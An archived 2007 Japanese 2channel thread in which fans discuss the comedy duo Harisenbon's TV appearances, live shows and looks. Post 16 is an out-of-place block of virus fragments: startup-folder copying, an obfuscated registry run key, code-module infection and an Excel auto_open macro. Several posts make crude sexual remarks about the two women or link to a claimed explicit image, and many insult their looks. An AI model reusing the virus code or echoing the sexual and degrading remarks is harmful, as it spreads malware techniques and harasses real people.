2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【近藤春菜】ハリセンボン6【箕輪はるか】

1 :名無しさん:2007/01/18(木) 01:52:19
東京吉本の女性コンビ。TBS「10カラット」などで
注目度急上昇中の2人を語りましょう。
他の女性芸人を引き合いに出すのはやめましょう。
次スレは>980が立てて下さい。

◆東京NSC9期生
◆TBS「スイッチ」出演中(終了)
◆5じ6じレギュラー

前スレ
【近藤春菜】ハリセンボン5【箕輪はるか】
http://tv9.2ch.net/test/read.cgi/geinin/1161258084/

【近藤】ハリセンボン【箕輪】
http://tv7.2ch.net/test/read.cgi/geinin/1122648977/
【10カラ】ハリセンボン2【紅一点】
http://tv7.2ch.net/test/read.cgi/geinin/1139728091/
角野卓造】ハリセンボン3【死神】
http://tv7.2ch.net/test/read.cgi/geinin/1146235105/
【綺麗じゃなきゃ】ハリセンボン4【意味ないし】
http://tv7.2ch.net/test/read.cgi/geinin/1155560492/


2 :名無しさん:2007/01/18(木) 01:54:30
石川梨華と結婚するのが吉澤ひとみの夢

3 :名無しさん:2007/01/18(木) 01:57:54
>>1
乙です

毎回次スレ立つの遅いな〜w

4 :名無しさん:2007/01/18(木) 02:24:07
>>1

5 :名無しさん:2007/01/18(木) 23:07:28
>>1おつ

6 :名無しさん:2007/01/19(金) 18:21:52
test

7 :名無しさん:2007/01/20(土) 05:41:48
>>1


8 :名無しさん:2007/01/20(土) 22:16:20
エンタ

9 :名無しさん:2007/01/20(土) 23:28:17
エンタは合コンネタだったね。
初登場で、改良なしで自前のネタをやらしてくれる。
この番組としてはかなりいい扱い(と言うべきか分からないけど)に思ったが…。

10 :名無しさん:2007/01/21(日) 00:01:54
久々にネタ見たけど おもしろかった

11 :名無しさん:2007/01/21(日) 00:03:18
生でネタみてみたいと思った

12 :名無しさん:2007/01/22(月) 01:52:29
漏れの彼女が女芸人ヲタだった…
はるかと中田の恋を本気で応援してるらしい


13 :名無しさん:2007/01/22(月) 03:43:23
http://ex20.2ch.net/test/read.cgi/tv/1166980705/l50
このスレでオリラジヲタがハリセンボンけなすことでオリラジの評価上げようと必死です

14 :名無しさん:2007/01/23(火) 10:01:26
はるかにゃんは僕の天使です

15 :名無しさん:2007/01/23(火) 11:11:29
こないだのエンタで唯一笑いました。
クスッとね。

16 :名無しさん:2007/01/23(火) 18:30:41
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


17 :名無しさん:2007/01/23(火) 18:43:33
夕べのスケートはよかった。
客席で見てるハルカさんが「受けてる〜」(春菜がお客に)と
うれしそうに笑っていたのが印象的。

18 :名無しさん:2007/01/23(火) 19:29:50
>>17
見逃した!何の番組?

19 :17:2007/01/23(火) 23:00:01
>>18
ド短期ツメコミ教育豪腕!コーチング!! 
ttp://www.tv-tokyo.co.jp/gowan/back/index.html

後編の昨日だけしか見てない。
前編も見たかった・・・

20 :名無しさん:2007/01/23(火) 23:18:59
>>19
ありがとう!テレビ東京か・・・元々見れないからよかったようなよくないようなw

21 :名無しさん:2007/01/24(水) 03:14:48
ダイナマイト関西みたけど意外とつーかかなりおもしろいよ

22 :名無しさん:2007/01/24(水) 03:28:01
箕輪はるかがうたばんでメイクした画像か動画、どっかに無いすかー??

23 :名無しさん:2007/01/24(水) 14:38:44
>>17
はるかちゃん楽しそうに見てたよね。
何回も抜かれてたけど、ずっと笑顔だった。

24 :名無しさん:2007/01/24(水) 16:38:14
>>23
いい笑顔でしたね>ハルカタン

25 :名無しさん:2007/01/24(水) 23:43:36
春菜もやっと24歳に・・・

26 :名無しさん@板分割議論中:2007/01/25(木) 01:24:54
さっきオリラジの番組に出てた二人のメイクが凄い可愛かった!!

27 :名無しさん@板分割議論中:2007/01/25(木) 12:11:58
ダウンタウンDXあげ。

28 :名無しさん@板分割議論中:2007/01/25(木) 14:05:53
>>22
画像は検索してるとよく出てくるよ。
でも、普段のノーメイクのはるかちゃんのほうが絶対かわいいと思う!
私はうたばんテレビで見たけど、メイク前のほうが好き。


29 :名無しさん@板分割議論中:2007/01/25(木) 22:31:32
ああ〜春菜の切り返しはやっぱ上手いわ
まだ23歳とは思えん技術

30 :名無しさん@板分割議論中:2007/01/25(木) 22:45:45
ああ〜春菜のフェラはやっぱ上手いわ
まだ23歳とは思えん技術

31 :名無しさん@板分割議論中:2007/01/25(木) 22:47:44
はるか=堀北真希

32 :名無しさん@板分割議論中:2007/01/25(木) 22:50:08
ハリセンボンはダウンタウンを超える天才

33 :名無しさん@板分割議論中:2007/01/25(木) 22:53:48
ハリセンボンはやっぱ実力あるよな
コンビバランスがこんなにいいコンビはいない
でもネタはつまらないけどな

34 :名無しさん@板分割議論中:2007/01/25(木) 22:54:04
メキシカン?メキシカン?

35 :名無しさん@板分割議論中:2007/01/25(木) 22:55:31
春菜が俺の母親に似てるんだがww

36 :名無しさん@板分割議論中:2007/01/25(木) 22:56:00
でも第二のオセロにはなれない

37 :名無しさん@板分割議論中:2007/01/25(木) 23:00:19
堀北似

38 :名無しさん@板分割議論中:2007/01/25(木) 23:03:55
DXで上手く絡めてたから次も呼ばれるな

39 :名無しさん@板分割議論中:2007/01/25(木) 23:05:41
ヒト□ー□)シ`l´ノ

40 :名無しさん@板分割議論中:2007/01/25(木) 23:06:28
>>32
激しく同意
 
そういえばエンディングはるかだったな・・・

41 :名無しさん@板分割議論中:2007/01/25(木) 23:11:43
春菜=竹山 サンボマスター 角野 
はるか=久本 さんま


42 :名無しさん@板分割議論中:2007/01/25(木) 23:13:03
はるか=山根 堀北

43 :名無しさん@板分割議論中:2007/01/25(木) 23:14:32
堀北って髪型だけだろw
顔が違いすぎる

44 :名無しさん@板分割議論中:2007/01/25(木) 23:15:37
目の寄り加減が似てるよ

45 :名無しさん@板分割議論中:2007/01/25(木) 23:16:33
はるか可愛い

46 :名無しさん@板分割議論中:2007/01/25(木) 23:16:57
似てない

47 :名無しさん@板分割議論中:2007/01/25(木) 23:18:36
ハリセンボンの勢いはいつまで続くのか
森三中より先に冠番組が持てるのかどうか

48 :名無しさん@板分割議論中:2007/01/25(木) 23:18:59
似てるなw

49 :ウンコ丸 ◇OuSqKaZgaA :2007/01/25(木) 23:19:14
MINOWAってなんであんな可愛いのに男よってこないの?

50 :名無しさん@板分割議論中:2007/01/25(木) 23:20:09
>>49
お前がマニアなだけ

51 :名無しさん@板分割議論中:2007/01/25(木) 23:23:10
ダウンタウンはハリセンボンの才能に恐怖を感じたに違いない

52 :名無しさん@板分割議論中:2007/01/25(木) 23:24:24
俺もかわいいと思うんだけど
ロンハーの格付けアンケートでも女芸人たちの中で最下位
男芸人が選ぶ女芸人で抱かなきゃいけないならアンケートでも最下位
なんだよな・・はるかは。春菜にすら負けてるし・・
やっぱマニアなのかな?


53 :名無しさん@板分割議論中:2007/01/25(木) 23:24:38
はるか可愛い。付き合いたい。

54 :名無しさん@板分割議論中:2007/01/25(木) 23:29:04
ハリセンボンは笑えるブスだからいんだよ


55 :ウンコ丸 ◇OuSqKaZgaA :2007/01/25(木) 23:30:37
可愛すぎて逆にヒいてしまうというパターンだね。高嶺の花というか
俺も正直箕輪ちゃん前にしたらタジタジになると思う(>_<;;

56 :名無しさん@板分割議論中:2007/01/25(木) 23:30:52
>>52
はるか≧春奈だとおもう
面白いからいいけどね

57 :名無しさん@板分割議論中:2007/01/25(木) 23:31:06
彼らはもちろん抱くとかの対象ではない。
なんていうかな。見て楽しむ物なんだ。
小屋とかで。キャーーーッ!!!とか言われながら。

58 :名無しさん@板分割議論中:2007/01/25(木) 23:33:37
お前ら眼科いけよ

59 :名無しさん@板分割議論中:2007/01/25(木) 23:34:47
どっちもかなりの不細工
面白いからいいけど

60 :名無しさん@板分割議論中:2007/01/25(木) 23:40:40
>>58
オマエは精神科にゴー

61 :名無しさん@板分割議論中:2007/01/25(木) 23:42:12
堀北真希似てる
つーか、はるか本人だよな

62 :名無しさん@板分割議論中:2007/01/25(木) 23:44:51
ハリセンボンは面白いけどアップきつい

63 :名無しさん@板分割議論中:2007/01/25(木) 23:45:23
ブス専&デブ専なので両方イケます

64 :名無しさん@板分割議論中:2007/01/25(木) 23:50:42
春菜もはるかも堂々としててよかった
また出てほしいなDTDX

65 :名無しさん@板分割議論中:2007/01/25(木) 23:51:17
>>63
芸人しか恋愛対象にならねえよww

66 :名無しさん@板分割議論中:2007/01/25(木) 23:59:51
ハリセンボンの深夜冠番組とか見てみたい

67 :名無しさん@板分割議論中:2007/01/26(金) 00:01:05
タモリ倶楽部とか似合いそう

68 :名無しさん@板分割議論中:2007/01/26(金) 00:02:19
冠番組を早く持つのだ!!
そして20年後にはM−1の大御所席に・・・

69 :名無しさん@板分割議論中:2007/01/26(金) 00:06:23
女芸人で冠とか持って成功してると言えるのはオセロくらいか?
まぁあいつらは芸人って感じではないからな


70 :名無しさん@板分割議論中:2007/01/26(金) 00:30:00
ピクチャー!

71 :名無しさん@板分割議論中:2007/01/26(金) 09:05:07
さすがに冠はまだ早いよ・・・
せっかくいい感じにテレビ出てるんだから
もっと力つけてからのほうがいいと思う
冠なんか持って失敗したら後がなくなるんじゃない?

72 :名無しさん@板分割議論中:2007/01/26(金) 13:07:37
ごきげんよう出てる!

73 :名無しさん@板分割議論中:2007/01/26(金) 13:16:02
またこの話?4回目くらいなんだけど。

74 :名無しさん@板分割議論中:2007/01/26(金) 13:24:27
各番組一回ずつはいくだろ普通。

75 :名無しさん@板分割議論中:2007/01/26(金) 13:33:38
>>73
私は空港の話もう5,6回は聞いた。
正直もういいだろ!って思います。
そういや年末くらいに関西ローカルの番組でこの話してたけど
めっちゃスベってました。
出演者の今田が必死にフォローしてたけど
正直可哀想な感じだった。
そろそろ視聴者も飽きてるだろうし
もし他にネタがあるなら他のネタを話した方が良いと思う。
ちょっと同じネタ話しすぎ。

76 :名無しさん@板分割議論中:2007/01/26(金) 13:40:44
よしもとの使い捨て芸人。
顔のインパクトの旬も過ぎかけ・・・

77 :名無しさん@板分割議論中:2007/01/26(金) 13:59:27
昨日のDXではパスポートの写真あり、ダウンタウンのコメントも面白かったので、今日のは劣化Ver.のように感じてしまった。
次回に期待。

78 :名無しさん@板分割議論中:2007/01/26(金) 15:47:38
やっぱ、いじってもらってなんぼの芸だな

79 :名無しさん@板分割議論中:2007/01/26(金) 18:16:35
はるか、ガテン系が好みってなんか意外

80 :名無しさん@板分割議論中:2007/01/26(金) 19:42:02
最近一番勢いがあるっぽいね。
ギャラ安そう

81 :名無しさん@板分割議論中:2007/01/26(金) 20:35:07
ブログやってるの近藤だけ?

82 :名無しさん@板分割議論中:2007/01/26(金) 20:56:49
>>81
だけだね。
大喜利系の企画ではるかさんを見たい!
内Pが今でも続いていればな…

83 :名無しさん@板分割議論中:2007/01/26(金) 22:04:43
>>32
冗談は顔だけにしてくれ

84 :名無しさん@板分割議論中:2007/01/26(金) 22:38:16
>>82
それは私も思った<内Pが続いていたら
正統派のはるかと無手勝流の大竹の対決が見たいw

85 :名無しさん@板分割議論中:2007/01/27(土) 00:55:22
やばい はるかを愛し始めている

86 :名無しさん@板分割議論中:2007/01/27(土) 01:42:26
メイク講座もやってほしい。
オリラジの番組のメイク綺麗過ぎた。

87 :名無しさん@板分割議論中:2007/01/27(土) 11:56:56
はるかちゃんがかわいいっていったら、「ハリセンボンがかわいかったら世界の女みんな可愛いし」とか、訳のわからないツッコミをブサデブジャニヲタにされました。
私は、あの時どう返せばよかったんでしょうか?
あとジャニヲタはなんでハリセンボン嫌いな人多いんですか(>_<)

88 :名無しさん@板分割議論中:2007/01/27(土) 13:13:04
>>87 そうなの?

89 :名無しさん@板分割議論中:2007/01/27(土) 13:26:47
結局は美的感覚というか、好みの問題だからブサと思う人もいればかわいいと思う人もいるんでしょう。

90 :名無しさん@板分割議論中:2007/01/27(土) 13:39:36
春菜さんのま○こなめたい

91 :名無しさん@板分割議論中:2007/01/27(土) 15:18:01
まなこ(眼)ですか?フェチでんな。

92 :名無しさん@板分割議論中:2007/01/27(土) 22:56:59
春菜は巨乳。

93 :名無しさん@板分割議論中:2007/01/27(土) 23:19:37
YOUたち!で田中君(坊主の子)をいじめるキャラをやってるからじゃないか
>ジャニヲタはなんでハリセンボン嫌い
逆にブスの癖にジャニの○○君と共演なんて許せない!とか
まあでも普通にブスとブスのコンビだよハリセンは
俺はマニアだから大好きだけど。

94 :名無しさん@板分割議論中:2007/01/28(日) 00:18:39
最近特にそっち方面の共演多いからね
ふたりの誕生日知ったらもっと逆鱗にふれる場合もあるんだろか
みんながみんなそうじゃないとは思うけどなー

昨日(と言うかこないだか)メントレ出てたね

95 :名無しさん@板分割議論中:2007/01/28(日) 01:12:24
綾瀬はるかが箕輪はるかに見えてしまった

96 :名無しさん@板分割議論中:2007/01/28(日) 04:35:12
ジャニはわからないけど、オリラジファンには嫌われてそう。
たまに春菜が胸にガムテして脱いだりするけど、森三中みたいな女の捨て方(ストレートな下ネタ)はしないからね。


97 :名無しさん@板分割議論中:2007/01/28(日) 09:30:11
女は捨てちゃダメだよね

98 :名無しさん@板分割議論中:2007/01/28(日) 11:46:32
春菜ちゃんに抱かれたい

99 :名無しさん@板分割議論中:2007/01/28(日) 18:25:53
ロフトプラスワン行ってきた。
ふたりのバランスがやっぱりいいね。
はるかの大喜利力をもっと見たかったよ。

100 :名無しさん@板分割議論中:2007/01/28(日) 19:13:21
お、トークライブ行って来たの?
裏山。ゲストとかいた?

101 :勝俣軍二:2007/01/28(日) 19:18:37
デブの方、痩せればいけると思う。今のままじゃ中年おばさんだ。
出っ歯の方、歯なおして、ばちっとメイクすればけっこういけると思う。今のままじゃ男か女か判別できない人いるよ。

102 :名無しさん@板分割議論中:2007/01/28(日) 21:31:02
私も行ったよ。はるかの刀の大喜利、面白かった。
春菜の仕切りもよかった

103 :名無しさん@板分割議論中:2007/01/29(月) 10:29:32
二人はよかったんだけど、同期の男の芸人どもの大喜利がすげー辛かった
華がないつーか
決定的な素質の差を感じてかわいそうだった

104 :名無しさん@板分割議論中:2007/01/29(月) 10:35:17
>>96
オリラジファンはハリセンボンに好意的だと思うぞ
ある程度知ってるファンは、バッドと一緒で昔からの仲間としてみてる人が多いんじゃないかな
なかよくしていても微笑ましくみてる

105 :名無しさん@板分割議論中:2007/01/29(月) 13:14:11
>>103
ジューシーズ、ゆったり感、しずる?
ひどかったなぁ。春菜が懸命に話膨らましてあげてた。
しずるのメガネじゃないほうが春菜にギャラの額しつこく聞くしw

106 :名無しさん@板分割議論中:2007/01/29(月) 13:19:02
デブじゃないほうの子は出っ歯矯正してモデルスクールで姿勢を身につければ
そうとうな美人になるぞ。ダイヤの原石があえてきかざらないでいるのがすごい萌える

107 :名無しさん@板分割議論中:2007/01/29(月) 13:58:48
>>103
華がないは言い過ぎじゃないかな。
同期の他の芸人さんたちも頑張ってるんだからさ。
でも、はるかがしゃべろうとしてるのに
はるかの声がまわりの芸人の声にかき消されてるのは残念だったな。
はるかのマイクのボリュームを他の人の10倍くらいにしておいてほしかった…。

108 :名無しさん@板分割議論中:2007/01/29(月) 14:09:19
>>107
はるか相方にも気づいてもらえず・・・
初めのお題で発表したい〜って動きは数回見せてたのに。
女芸人トークの方もよかった。
鬼奴ステージだけで生中×2、大×1飲んでたな

109 :名無しさん@板分割議論中:2007/01/29(月) 15:33:10
>>108
女芸人のトーク良かったよね〜。
アンナって初めて見たけど、可愛いし面白い!
誰より顔が女の子だった…。

110 :名無しさん@板分割議論中:2007/01/29(月) 18:40:35
はるなって短大で何専攻してたの?

111 :名無しさん@板分割議論中:2007/01/29(月) 20:07:35
ハリセンボンと同じがりデブでもアジアンは、何かむかつくんだよね。
二人とも口が達者だからかな? ハリセンボンは、見ていて可愛げが
あるんだけどアジアンは、醜い

112 :名無しさん@板分割議論中:2007/01/29(月) 20:28:51
>>111
ageてるし釣りだろうが>>1を100回読めよカス

113 :名無しさん@板分割議論中:2007/01/30(火) 00:40:22
ロフトプラスワンの写真↓
ttp://shinjukuloft.com/blog/lpo/archives/200701/29-0206.php
ちなみに次のページには、ダイナミックダイナマが。

114 :名無しさん@板分割議論中:2007/01/30(火) 05:22:19
黒田荘の宴面白かった


115 :名無しさん@板分割議論中:2007/01/30(火) 08:30:26
はるなの方がひとりで頑張ってる感がある、このコンビ
痩せの方は何かあんまり仕事してないイメージ。

116 :名無しさん@板分割議論中:2007/01/30(火) 10:20:24
はるかは声ちっさいしおとなしいイメージが強いからなー
活躍する時は活躍するんだけど。

117 :名無しさん@板分割議論中:2007/01/30(火) 10:59:51
>>115
ロンハーで春菜「体張るのはいつも私」って言ってたもんね。
そういうロケの時ってはるかは見てるだけってことだよね…?


118 :名無しさん@板分割議論中:2007/01/30(火) 11:12:43
>117
春菜のみロケ、はるか待機ってパターンが多いような。
バランス取れてていいんじゃね?
はるかは体より頭使う方だし(大喜利とか)
春菜の方もヘリからの飛び降り断念したり、
結構甘く見てもらってるとこと多い気がするけどなあ。

ところで
CDデビューについての記事が載ってるスポーツ紙が
どれだか分かる人いない?
さっきなるトモで紹介されてたんだけど、
紙名見逃してしまった。


119 :名無しさん@板分割議論中:2007/01/30(火) 11:13:31
×もらってるとこと
○もらってるところ

orz

120 :名無しさん@板分割議論中:2007/01/30(火) 13:35:23
ごきげんようでもCD宣伝してたな。
ってか箕輪さん実家住まいなんだ

121 :名無しさん@板分割議論中:2007/01/30(火) 13:39:47
>>120
ふたりとも実家だよ。
よしもと本物流のRoomsとかいうコーナーではるかの部屋ばっちり映ってたよ。
はるかは押入れをベットにして寝てるよ。

122 :名無しさん@板分割議論中:2007/01/30(火) 14:30:18
やっぱりCD出すんだ。テレビでどっかのスポーツ紙映ったときちらっと見えた。残念ながらイジられず。

123 :名無しさん@板分割議論中:2007/01/30(火) 16:15:23
>>121
知らんかった…箕輪さんは吉祥寺に一人暮らししてるって噂があったからつい…

124 :名無しさん@板分割議論中:2007/01/30(火) 18:12:33
女芸人で面白いって思えたのは久しぶりかも。

顔で得してるから、飽きられるであろうこれから2年間ぐらい今の勢いを持続できれば
そこそこのポジション築けそうジャマイカ?

125 :名無しさん@板分割議論中:2007/01/30(火) 18:23:45
今夜さんま御殿にでるみたい

126 :名無しさん@板分割議論中:2007/01/30(火) 19:08:44
>>123
噂って…どこで聞いたの?
けっこうテレビでもはるかの家映ってるよ〜

127 :名無しさん@板分割議論中:2007/01/30(火) 23:18:23
山本モナ。

128 :名無しさん@板分割議論中:2007/01/30(火) 23:49:49
はあ、最近はるにゃんズ不足…
受験おわったら絶対会いにいくもんね!
はるかにゃんとはるなにゃんはカワユスなのだ(^ω^)うおうお

129 :名無しさん@板分割議論中:2007/01/31(水) 11:01:53
さんま御殿イマイチだったな。
もっといじられるかと思ってたのに。

130 :名無しさん@板分割議論中:2007/01/31(水) 13:06:55
1月31日(水) 18:55〜20:54
TBSテレビ 水トク!芸人料理王決定戦2007
ウマイド〜美食祭り!

春菜が料理つくるらしい



131 :名無しさん@板分割議論中:2007/01/31(水) 13:56:14
>>129
オープニングでやった「エジプトの壁画の女性も」
すべってた感じだったね

132 :名無しさん@板分割議論中:2007/01/31(水) 14:23:02
>>131
すべってたよね。
同じネタばっかだし、けっこう飽きられるの早いかもしれない・・・。
好きだけど、世間はそんなに甘くないよね。

133 :名無しさん@板分割議論中:2007/01/31(水) 14:52:55
確かに同じネタだとあきられちゃうよね・・・ でも何かアレンジすればまだまだいけるような気がする ハリセンボンがんばれ!

134 :名無しさん@板分割議論中:2007/01/31(水) 19:15:26
癒し系の二人だからね。トークは、あんまし面白くないけど
頑張ってほしい。

135 :名無しさん@板分割議論中:2007/01/31(水) 19:23:53
山本モナ。

136 :名無しさん@板分割議論中:2007/01/31(水) 19:55:57
ハリセンボンって創価芸人の典型だね。面白くないのにテレビにたくさん出させてもらえて。

137 :名無しさん@板分割議論中:2007/01/31(水) 21:04:21
つまらんうえに不愉快。
二度と出てくるな!


138 :名無しさん@板分割議論中:2007/01/31(水) 22:55:00
いつも思うんだが、近藤春菜って可愛い名前だよね。
ハリセンボン好き。頑張ってほしい

139 :名無しさん@板分割議論中:2007/02/01(木) 00:53:11
マイケルムーア

140 :名無しさん@板分割議論中:2007/02/01(木) 13:51:00
春菜がウケると思って繰り返してるネタは致命的につまんないけど
突発的に出たボケはたまに面白いと思うからそこを伸ばして欲しい

141 :名無しさん@板分割議論中:2007/02/01(木) 19:47:26
あごのタプタプしてんじゃねいよとかw
はるかって早稲田だけど春菜って大学出ているのかな?

142 :名無しさん@板分割議論中:2007/02/01(木) 19:50:11
春菜さんは短大卒

143 :名無しさん@板分割議論中:2007/02/01(木) 20:09:26
どこの短大?

144 :名無しさん@板分割議論中:2007/02/01(木) 21:29:27
春菜ちゃん可愛いい

145 :名無しさん@板分割議論中:2007/02/01(木) 21:46:26
>143
桐朋だよ。
舞台クリエイト科か演劇科出身

146 :名無しさん@板分割議論中:2007/02/02(金) 00:17:10
桐朋の先輩というと女優の高畑淳子とかピアニストの西村由紀江とか。
春菜はやっぱいいとこのお嬢さんなんだな。

147 :名無しさん@板分割議論中:2007/02/02(金) 01:14:57
春菜、演技の勉強してたの?
発声と滑舌が良いのはそのためか

148 :名無しさん@板分割議論中:2007/02/02(金) 12:59:30
来週のチャブのラジオに出ますよ

149 :名無しさん@板分割議論中:2007/02/02(金) 15:42:55
>>148
チャブって何のことかと思ったらアンタッチャブルのことかw

150 :名無しさん@板分割議論中:2007/02/02(金) 23:02:53
ほほホタル、プチ!

151 :名無しさん@板分割議論中:2007/02/03(土) 03:24:18
今あっちゃんがラジオで、今週はるかと初めて飲みに行った(多分二人きり?)って話してた。

朝のラストオーダーまで5時間話しまくってたらしいw
どっちから誘ったんだろ?

152 :名無しさん@板分割議論中:2007/02/03(土) 03:27:56
はるかが人誘うってのが想像できないが…
話合うんだね2人

153 :名無しさん@板分割議論中:2007/02/03(土) 04:18:21
箕輪のアソコはいい匂いだって「ほしゃん」が言ってた(まじ)

154 :名無しさん@板分割議論中:2007/02/03(土) 11:22:51
>>153アソコがいい匂いの女なんているかよ
処女でも鉄みたいな匂いすんのに

155 :名無しさん@板分割議論中:2007/02/03(土) 23:50:20
印籠について語ったらしい>中田との飲み
たこと蛸壺の印籠

156 :名無しさん@板分割議論中:2007/02/03(土) 23:55:21
このスレまだやってたのか

157 :名無しさん@板分割議論中:2007/02/04(日) 00:05:24
>>155
渋いなぁ。
中田もはるかもマニアックな知識たくさん持ってそう

158 :名無しさん@板分割議論中:2007/02/04(日) 01:12:31
好きな工具や武器?について語ってたって。
はるかが印籠って答えたらしい

159 :名無しさん@板分割議論中:2007/02/04(日) 01:17:57
箕輪さんは大学時代友達できなかったって言っても
文学部二部なんだからある程度仕方ないんじゃないの?
夜間だよね?

160 :名無しさん@板分割議論中:2007/02/04(日) 02:43:46
女芸人にしてはズバぬけて面白いな

161 :名無しさん@板分割議論中:2007/02/04(日) 02:49:35
俺のはるかがぁぁぁああああああああ!!!!
あんなナルシストに寝取られてまぅぅぅぅううう!!!!

162 :名無しさん@板分割議論中:2007/02/04(日) 02:52:04
だがそれがいい

163 :名無しさん@板分割議論中:2007/02/04(日) 03:19:56
どこかに不幸顔の女性いないかなぁ・・・。はるかみたいな。

164 :名無しさん@板分割議論中:2007/02/04(日) 03:38:17
はるかの工事現場好きもワロタけど印籠好きも興味深いな。
今度トークライブやったらアンケートに書いてみよ

165 :大竹いまる:2007/02/04(日) 13:10:12
はるかのマンコ↓
http://upload.fam.cx/cgi-bin/img-box/ci470202023207.jpg

166 :名無しさん@板分割議論中:2007/02/04(日) 14:56:55
>>165なんでさんまさんの娘が書き込みやっとんねん

167 :名無しさん@板分割議論中:2007/02/04(日) 15:26:26
中田とはるかお似合いじゃん
お幸せにw

168 :名無しさん@板分割議論中:2007/02/04(日) 22:16:21
今夜は「堂本兄弟」に出るよ

169 :名無しさん@板分割議論中:2007/02/04(日) 23:25:45
はるか可愛い

170 :名無しさん@板分割議論中:2007/02/04(日) 23:32:09
女なのに面白いー

171 :名無しさん@板分割議論中:2007/02/04(日) 23:43:03
箕輪ちゃんが歌うと意外と声が良かった

172 :名無しさん@板分割議論中:2007/02/04(日) 23:43:48
はるか歌上手いね

173 :名無しさん@板分割議論中:2007/02/04(日) 23:45:20
同感
はるかの歌声なかなか良かった

174 :名無しさん@板分割議論中:2007/02/04(日) 23:46:26
そうそう、箕輪ちゃん歌上手くて意外だったw
それに比べたら近藤は下手だったな。。。

175 :名無しさん@板分割議論中:2007/02/04(日) 23:46:33
一生懸命でエライね。

176 :名無しさん@板分割議論中:2007/02/04(日) 23:47:11
ハルカの声いいねぇ

177 :名無しさん@板分割議論中:2007/02/04(日) 23:48:04
はるかは化粧して出っ歯治したらそこらの女より全然見た目良くなりそうだ

178 :名無しさん@板分割議論中:2007/02/04(日) 23:48:33
はぁ!?
こいつらの何処が面白い訳よ?
豚の方はどこにでもいるような勘違いドブスだし
鶏ガラの方は天然気取るブスだろ!
全てにおいて汚らくだらしない。
芸人として笑いを取れてる訳じゃない。即刻消えろ!!
要らない芸人No1

179 :名無しさん@板分割議論中:2007/02/04(日) 23:50:32
はるかの歌声好きだな良い声してるよな


2人ともいいキャラしてるから今年もっと売れそうだな


180 :名無しさん@板分割議論中:2007/02/04(日) 23:51:34
>>178
はいはい、ゲス野郎は黙っててね!(^^♪

181 :名無しさん@板分割議論中:2007/02/04(日) 23:52:44
>>178スレ違いのテメーが消えなさいアホ。
はるかさん・・・えぇわぁ〜

182 :名無しさん@板分割議論中:2007/02/04(日) 23:56:43
はるかさんは魅力的な歌声だったね。私には浜崎あゆみ以上の気持ちが入った声に聞こえました。あたしブス専だからはるかさんは魅力的だ。

183 :名無しさん@板分割議論中:2007/02/04(日) 23:58:00
死んだような目で、工藤静かのシーンを見てた箕輪さん

184 :名無しさん@板分割議論中:2007/02/04(日) 23:58:32
>>182いやいやいや、はるかさんは決してブスじゃないから!
普通に魅力的な女性だよ

185 :名無しさん@板分割議論中:2007/02/05(月) 00:00:36
はるかの衣装もカジュアルで決まってたね。私もはるか並に痩せなきゃ。今は春菜に近い体型だから(;_;)

186 :名無しさん@板分割議論中:2007/02/05(月) 01:10:55
この2人すごい面白い!!
ファンになったww

絶対売れるよー!それぞれピンでもキャラ立ってるし、コンビでも面白すぎww

187 :名無しさん@板分割議論中:2007/02/05(月) 01:12:47
http://www.harukafamily.com/top/eco/act/saop18.html

188 :名無しさん@板分割議論中:2007/02/05(月) 03:49:55
この人たち、創価なの?

189 :名無しさん@板分割議論中:2007/02/05(月) 06:40:20
はるかの歌声低くてカッコよかった

190 :名無しさん@板分割議論中:2007/02/05(月) 07:21:59
光一に言われ放題w

191 :名無しさん@板分割議論中:2007/02/05(月) 07:41:33
堂本兄弟見たからか、
夢にハリセンボンばっかり出てきた。

192 :名無しさん@板分割議論中:2007/02/05(月) 08:29:43
ハリセンボンと言うよりはるかに惚れました。
この時点で私の中でははるかは井川遥を超えました。
創価でも別に構わないけどbyクリスチャン

193 :名無しさん@板分割議論中:2007/02/05(月) 09:08:13
はるかマジでいい声してるね。
音楽活動もありだな。

194 :名無しさん@板分割議論中:2007/02/05(月) 09:14:58
こいつら素のトークじゃつまらんことがわかった。
ありきたりのボケや返しを演じるように発声してるだけの素人だったな。オリラジもそうだな

195 :名無しさん@板分割議論中:2007/02/05(月) 11:18:51
じゃあアンチスレに逝けばいいじゃん。ここは今からはるか様を崇拝するスレに変わりました。

196 :名無しさん@板分割議論中:2007/02/05(月) 11:33:23
★ハリセンボンの携帯画像作ったよ。
待ち受けにいかが?
http://p2.ms/3a2xq
系列の似たアジアンの顔も載せておくけど
http://p2.ms/4c0i9

197 :名無しさん@板分割議論中:2007/02/05(月) 12:03:58
2人とも自分のコンプレックスをネタに出来て尊敬する。
私も2人みたいに強くなりたいなぁ…

198 :名無しさん@板分割議論中:2007/02/05(月) 12:16:19
堂本兄弟で、
速水もこみち?と出演したときに、箕輪のほうが
パンツ丸見えになったとか言ってたんだが。

探したけどないわ・・・。

199 :名無しさん@板分割議論中:2007/02/05(月) 12:27:25
はるか可愛いな

200 :名無しさん@板分割議論中:2007/02/05(月) 12:54:03
>>198
LIVE10でしょ?
今田さんが司会の奴

201 :名無しさん@板分割議論中:2007/02/05(月) 13:42:59
196サンクス
しっかり頂きました。

202 :名無しさん@板分割議論中:2007/02/05(月) 16:51:43
堂本、嫌な奴と思った。

203 :名無しさん@板分割議論中:2007/02/05(月) 17:44:35
>>195はるか専用スレあるよ!
そこもいい感じだよ

204 :名無しさん@板分割議論中:2007/02/06(火) 00:07:21
「すえぜん」キツかったんだね…
冬だったしね

